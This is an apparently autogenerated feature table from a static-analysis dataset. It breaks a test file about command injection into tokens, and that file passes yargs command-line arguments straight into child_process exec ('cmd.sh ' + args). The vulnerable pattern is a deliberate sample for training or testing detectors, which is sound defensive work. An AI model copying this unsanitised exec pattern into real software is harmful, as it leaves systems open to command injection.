autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:48:9:50:3 | {\\n\\t\\t\\t...args\\n\\t\\t} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:49:7:49:10 | ...args | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:49:7:49:10 | ...args | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:49:7:49:10 | ...args | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:49:7:49:10 | ...args | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:49:7:49:10 | ...args | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:49:7:49:10 | args | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:49:7:49:10 | args | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:49:7:49:10 | args | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:49:7:49:10 | args | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:49:7:49:10 | args | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:51:12 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:51:12 | require | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:51:12 | require | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:51:12 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:51:12 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:51:21 | exceptional return of require('yargs') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:51:21 | exceptional return of require('yargs') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:51:21 | exceptional return of require('yargs') | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:51:21 | exceptional return of require('yargs') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:51:21 | exceptional return of require('yargs') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:51:21 | require('yargs') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:51:21 | require('yargs') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:51:21 | require('yargs') | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:51:21 | require('yargs') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:51:21 | require('yargs') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:52:8 | require ... \\t.usage | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:52:8 | require ... \\t.usage | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:52:8 | require ... \\t.usage | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:52:8 | require ... \\t.usage | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:52:8 | require ... \\t.usage | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:52:26 | exceptional return of require ... o bar') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:52:26 | exceptional return of require ... o bar') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:52:26 | exceptional return of require ... o bar') | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:52:26 | exceptional return of require ... o bar') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:52:26 | exceptional return of require ... o bar') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:52:26 | require ... o bar') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:52:26 | require ... o bar') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:52:26 | require ... o bar') | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:52:26 | require ... o bar') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:52:26 | require ... o bar') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:53:10 | require ... command | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:53:10 | require ... command | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:53:10 | require ... command | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:53:10 | require ... command | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:53:10 | require ... command | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:53:12 | exceptional return of require ... mmand() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:53:12 | exceptional return of require ... mmand() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:53:12 | exceptional return of require ... mmand() | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:53:12 | exceptional return of require ... mmand() | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:53:12 | exceptional return of require ... mmand() | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:53:12 | require ... mmand() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:53:12 | require ... mmand() | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:53:12 | require ... mmand() | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:53:12 | require ... mmand() | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:53:12 | require ... mmand() | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:14:51:20 | 'yargs' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:14:51:20 | 'yargs' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:14:51:20 | 'yargs' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:14:51:20 | 'yargs' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:14:51:20 | 'yargs' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:14:51:20 | 'yargs' | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:14:51:20 | 'yargs' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:14:51:20 | 'yargs' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:52:4:52:8 | usage | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:52:4:52:8 | usage | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:52:4:52:8 | usage | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:52:4:52:8 | usage | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:52:4:52:8 | usage | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:52:10:52:25 | 'Usage: foo bar' | CalleeFlexibleAccessPath | import(!).usage | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:52:10:52:25 | 'Usage: foo bar' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:52:10:52:25 | 'Usage: foo bar' | calleeImports | yargs | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:52:10:52:25 | 'Usage: foo bar' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:52:10:52:25 | 'Usage: foo bar' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:52:10:52:25 | 'Usage: foo bar' | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:52:10:52:25 | 'Usage: foo bar' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:52:10:52:25 | 'Usage: foo bar' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:53:4:53:10 | command | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:53:4:53:10 | command | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:53:4:53:10 | command | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:53:4:53:10 | command | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:53:4:53:10 | command | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:2:55:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:2:55:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:2:55:3 | cp | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:2:55:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:2:55:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:2:55:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:2:55:8 | cp.exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:2:55:8 | cp.exec | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:2:55:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:2:55:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:2:55:26 | cp.exec ... + args) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:2:55:26 | cp.exec ... + args) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:2:55:26 | cp.exec ... + args) | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:2:55:26 | cp.exec ... + args) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:2:55:26 | cp.exec ... + args) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:2:55:26 | exceptional return of cp.exec ... + args) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:2:55:26 | exceptional return of cp.exec ... + args) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:2:55:26 | exceptional return of cp.exec ... + args) | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:2:55:26 | exceptional return of cp.exec ... + args) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:2:55:26 | exceptional return of cp.exec ... + args) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:5:55:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:5:55:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:5:55:8 | exec | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:5:55:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:5:55:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:10:55:18 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:10:55:18 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:10:55:18 | "cmd.sh " | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:10:55:18 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:10:55:18 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:10:55:18 | "cmd.sh " | stringConcatenatedWith | -endpoint- args | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:10:55:25 | "cmd.sh " + args | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:10:55:25 | "cmd.sh " + args | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:10:55:25 | "cmd.sh " + args | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:10:55:25 | "cmd.sh " + args | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:10:55:25 | "cmd.sh " + args | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:10:55:25 | "cmd.sh " + args | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:10:55:25 | "cmd.sh " + args | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:10:55:25 | "cmd.sh " + args | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:10:55:25 | "cmd.sh " + args | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:22:55:25 | args | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:22:55:25 | args | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:22:55:25 | args | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| 